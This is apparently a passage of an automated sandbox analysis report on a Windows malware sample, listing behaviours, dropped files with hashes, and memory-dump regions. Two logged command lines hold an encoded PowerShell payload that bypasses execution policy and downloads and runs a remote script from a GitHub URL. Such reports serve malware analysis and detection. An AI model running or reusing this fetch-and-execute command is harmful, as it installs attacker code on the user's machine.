  cmdline: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
- [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  cmdline: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  - Blocklisted process makes network request
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\8FD8.exe
  MD5: 63151e4f7c3972f18a23c0e9996e14ef
  SHA1: 5d041fde6433a8ff8fc78a69fca1fd4630e3f270
  SHA256: cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3
  SHA512: f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec
-
C:\Users\Admin\AppData\Local\Temp\RESAA84.tmpMD5
1f5107cde41f9b56ee0669b9d308fe3c
SHA1badd44b4711229daae29976286595ea50c7b3259
SHA25698e6e89bc7ee50963208bfc4d6c8abc2d78668e162cea9fceb241a00e535e959
SHA5120079e538a33fb20250bb5dfbad22183d3a5234cfe7fb20e8189a3e491156f5e8bcd5a0fbb3fe556abdbe9842b0e849110a9fb14b27189df1add3d4a0a2d9d91b
-
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1MD5
f783019c5dc4a5477d1ffd4f9f512979
SHA137c8d1e5dd2ebce647c4e0a92f8598ebf2fdcc7b
SHA2564c81fee866a87b2de6e10640fe094f0db29258014177e294ac94a819940f5348
SHA51264d90352f4466f0097dd2c7ace8ccb155947dda8ae148c8c6ba1507a9e879247fab2eba452c812ba628a65de93cc096dabfcb23d2be4b525a92e5ef9e4b57d6a
-
C:\Users\Admin\AppData\Local\Temp\ok2j0wes\ok2j0wes.dll
MD5 61e776ecbbc56e90c4d315ca14b31b5e
SHA1 90bcda6d41405ff191077e91ea72ea783feb3f7e
SHA256 21ecae57c458b694b2750f97c33519bff1b9da253c0f2af277b4e5d8b9a4b685
SHA512 3620363d6aaf82dd973e56e0ecbf954938c78b64fc455d3f3d650cbf3f86c5bb423940bfe82ac4e6830465628c4103bd17977d4d6128d4168d2d80508918cd5d
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1
MD5 28d9755addec05c0b24cca50dfe3a92b
SHA1 7d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256 abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
\??\c:\Users\Admin\AppData\Local\Temp\ok2j0wes\CSC1F554B787EB747A1B8AA18148AA57AB.TMP
MD5 234f28790f7480f6b62d3b41f8578a47
SHA1 53d4d94f5e36f5e519fb939ea29312c79a15272f
SHA256 fbe2d03b4e696077c38caf92564de0748cc1e844fc230858bc0a413e08d3b281
SHA512 711756cc090413e971d09fa4abd2a317da518dfd348dbcc1db23b8f6ce3bb79e756990ad31356dbb104472c80777a1414e6594cb0d12de0e9db6eba252aefc56
-
\??\c:\Users\Admin\AppData\Local\Temp\ok2j0wes\ok2j0wes.0.cs
MD5 9f8ab7eb0ab21443a2fe06dab341510e
SHA1 2b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256 e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA512 53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
\??\c:\Users\Admin\AppData\Local\Temp\ok2j0wes\ok2j0wes.cmdline
MD5 50ff482f56afe0cfd3c2b235aabbccc9
SHA1 fbc72f199cbf7bade6be03c099df51ce6b2f9067
SHA256 531ed601b6467c5ca2ed41f220f8fbd7a7442a4075f6c9824711f9e76cb244b8
SHA512 82a46ed9c0d3280e64e95d61beb26fd2b63624c14d5ed7812daeb0e3daa91924baab7e89aa43b32e0256ccc6b7b31837051a796b7e2a6653417456eec0a96148
-
\Windows\Branding\mediasrv.png
MD5 ac13d804585a74dc542db4ec94da39df
SHA1 8642ae2e04e492700caf41b43de9ef9d8b3c26f9
SHA256 84c41dc018689fcb2fc4240f1e0267a5ee82232e3bcd541f5f5bed4139cfcd55
SHA512 0ba869487fda38d398903df4235bd8f2d0f8fb774b559125ba278751a5a503adbb0557f9ea2fde5fecba4f1a33b71583be36fac0f6f8842cbee0bdd7ea2fb5bf
-
\Windows\Branding\mediasvc.png
MD5 9151c95451abb048a44f98d0afac8264
SHA1 22f447b210eb25c11be5a9c31f254f5f2bd50a78
SHA256 8082bfe8a9f63854d6317cf6ddc0c18c54140ee5d179a96bfe9900c90d994518
SHA512 728b140e68dcb6751cccb4d1046ac61f63e8db13d4f613b44e161d457f107acc11b3275167c7b4dff34a6d5966116ecb062f94713d0cf4f35b327d14ec7cbd13
-
memory/692-436-0x000001ED63888000-0x000001ED63889000-memory.dmp Filesize 4KB
-
memory/692-410-0x000001ED63886000-0x000001ED63888000-memory.dmp Filesize 8KB
-
memory/692-403-0x000001ED63880000-0x000001ED63882000-memory.dmp Filesize 8KB
-
memory/692-392-0x0000000000000000-mapping.dmp
-
memory/692-404-0x000001ED63883000-0x000001ED63885000-memory.dmp Filesize 8KB
-
memory/844-282-0x00000239C4563000-0x00000239C4565000-memory.dmp Filesize 8KB
-
memory/844-314-0x00000239C4568000-0x00000239C456A000-memory.dmp Filesize 8KB
-
memory/844-281-0x00000239C4560000-0x00000239C4562000-memory.dmp Filesize 8KB
-
memory/844-313-0x00000239C4566000-0x00000239C4568000-memory.dmp Filesize 8KB
-
memory/844-264-0x0000000000000000-mapping.dmp
-
memory/1012-389-0x0000000000000000-mapping.dmp
-
memory/1128-373-0x0000000000000000-mapping.dmp
-
memory/1148-383-0x0000000000000000-mapping.dmp
-
memory/1240-131-0x0000000000000000-mapping.dmp
-
memory/1240-159-0x0000021EF2880000-0x0000021EF2881000-memory.dmp Filesize 4KB
-
memory/1240-145-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmp Filesize 8KB
-
memory/1240-149-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmp Filesize 8KB
-
memory/1240-150-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmp Filesize 8KB
-
memory/1240-151-0x0000021EF28E6000-0x0000021EF28E8000-memory.dmp Filesize 8KB
-
memory/1240-142-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmp Filesize 8KB
-
memory/1240-141-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmp Filesize 8KB
-
memory/1240-140-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmp Filesize 8KB
-
memory/1240-132-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmp Filesize 8KB
-
memory/1240-139-0x0000021EF28E3000-0x0000021EF28E5000-memory.dmp Filesize 8KB
-
memory/1240-137-0x0000021EF2820000-0x0000021EF2821000-memory.dmp Filesize 4KB
-
memory/1240-138-0x0000021EF28E0000-0x0000021EF28E2000-memory.dmp Filesize 8KB
-
memory/1240-143-0x0000021EF49C0000-0x0000021EF49C1000-memory.dmp Filesize 4KB
-
memory/1240-136-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmp Filesize 8KB
-
memory/1240-161-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmp Filesize 8KB
-
memory/1240-165-0x0000021EF5440000-0x0000021EF5441000-memory.dmp Filesize 4KB
-
memory/1240-166-0x0000021EF57D0000-0x0000021EF57D1000-memory.dmp Filesize 4KB
-
memory/1240-167-0x0000021EF28E8000-0x0000021EF28E9000-memory.dmp Filesize 4KB
-
memory/1240-174-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmp Filesize 8KB
-
memory/1240-175-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmp Filesize 8KB
-
memory/1240-135-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmp Filesize 8KB
-
memory/1240-134-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmp Filesize 8KB
-
memory/1240-133-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmp Filesize 8KB
-
memory/1276-374-0x0000000000000000-mapping.dmp
-
memory/1524-462-0x0000000000000000-mapping.dmp
-
memory/1688-184-0x0000023062D50000-0x0000023062D52000-memory.dmp Filesize 8KB
-
memory/1688-177-0x0000023062D50000-0x0000023062D52000-memory.dmp Filesize 8KB
-
memory/1688-183-0x0000023062D50000-0x0000023062D52000-memory.dmp Filesize 8KB
-
memory/1688-185-0x000002307CBE0000-0x000002307CBE2000-memory.dmp Filesize 8KB
-
memory/1688-186-0x000002307CBE3000-0x000002307CBE5000-memory.dmp Filesize 8KB
-
memory/1688-187-0x0000023062D50000-0x0000023062D52000-memory.dmp Filesize 8KB
-
memory/1688-188-0x0000023062D50000-0x0000023062D52000-memory.dmp Filesize 8KB
-
memory/1688-190-0x0000023062D50000-0x0000023062D52000-memory.dmp Filesize 8KB
-
memory/1688-208-0x000002307CBE6000-0x000002307CBE8000-memory.dmp Filesize 8KB
-
memory/1688-176-0x0000000000000000-mapping.dmp
-
memory/1688-178-0x0000023062D50000-0x0000023062D52000-memory.dmp Filesize 8KB
-
memory/1688-243-0x000002307CBE8000-0x000002307CBEA000-memory.dmp Filesize 8KB
-
memory/1688-179-0x0000023062D50000-0x0000023062D52000-memory.dmp Filesize 8KB
-
memory/1688-180-0x0000023062D50000-0x0000023062D52000-memory.dmp Filesize 8KB
-
memory/1688-181-0x0000023062D50000-0x0000023062D52000-memory.dmp Filesize 8KB
-
memory/1800-381-0x0000000000000000-mapping.dmp
-
memory/2000-377-0x0000000000000000-mapping.dmp
-
memory/2012-384-0x0000000000000000-mapping.dmp
-
memory/2368-152-0x0000000000000000-mapping.dmp
-
memory/2420-325-0x0000000000000000-mapping.dmp
-
memory/2500-155-0x0000000000000000-mapping.dmp
-
memory/2768-378-0x0000000000000000-mapping.dmp
-
memory/2780-380-0x0000000000000000-mapping.dmp
-
memory/2824-463-0x0000000000000000-mapping.dmp
-
memory/3012-324-0x0000000000000000-mapping.dmp
-
memory/3056-121-0x0000000000720000-0x0000000000736000-memory.dmp Filesize 88KB
-
memory/3212-326-0x0000000000000000-mapping.dmp
-
memory/3220-118-0x0000000003130000-0x0000000003138000-memory.dmp Filesize 32KB
-
memory/3220-120-0x0000000000400000-0x0000000002EF4000-memory.dmp Filesize 43.0MB
-
memory/3220-119-0x0000000003140000-0x0000000003149000-memory.dmp Filesize 36KB
-
memory/3232-364-0x0000000000000000-mapping.dmp
-
memory/3440-391-0x0000000000000000-mapping.dmp
-
memory/3944-368-0x0000000000000000-mapping.dmp
-
memory/4116-390-0x0000000000000000-mapping.dmp
-
memory/4256-382-0x0000000000000000-mapping.dmp
-
memory/4512-379-0x0000000000000000-mapping.dmp
-
memory/4524-363-0x0000000000000000-mapping.dmp
-
memory/4564-372-0x0000000000000000-mapping.dmp
-
memory/4568-371-0x0000000000000000-mapping.dmp
-
memory/4580-125-0x000002034F2B0000-0x000002034F6AF000-memory.dmp Filesize 4.0MB
-
memory/4580-122-0x0000000000000000-mapping.dmp
-
memory/4580-129-0x000002034EE95000-0x000002034EE96000-memory.dmp Filesize 4KB
-
memory/4580-130-0x000002034EE96000-0x000002034EE97000-memory.dmp Filesize 4KB
-
memory/4580-127-0x000002034EE90000-0x000002034EE92000-memory.dmp Filesize 8KB
-
memory/4580-128-0x000002034EE93000-0x000002034EE95000-memory.dmp Filesize 8KB
-
memory/4624-367-0x0000000000000000-mapping.dmp
-
memory/4656-370-0x0000000000000000-mapping.dmp
-
memory/4676-369-0x0000000000000000-mapping.dmp
-
memory/4932-386-0x0000000000000000-mapping.dmp
-
memory/5020-387-0x0000000000000000-mapping.dmp
-
memory/5032-388-0x0000000000000000-mapping.dmp
-
memory/5052-385-0x0000000000000000-mapping.dmp
-
memory/5064-222-0x0000000000000000-mapping.dmp
-
memory/5064-280-0x000001BAC55B8000-0x000001BAC55BA000-memory.dmp Filesize 8KB
-
memory/5064-249-0x000001BAC55B6000-0x000001BAC55B8000-memory.dmp Filesize 8KB
-
memory/5064-247-0x000001BAC55B3000-0x000001BAC55B5000-memory.dmp Filesize 8KB
-
memory/5064-245-0x000001BAC55B0000-0x000001BAC55B2000-memory.dmp Filesize 8KB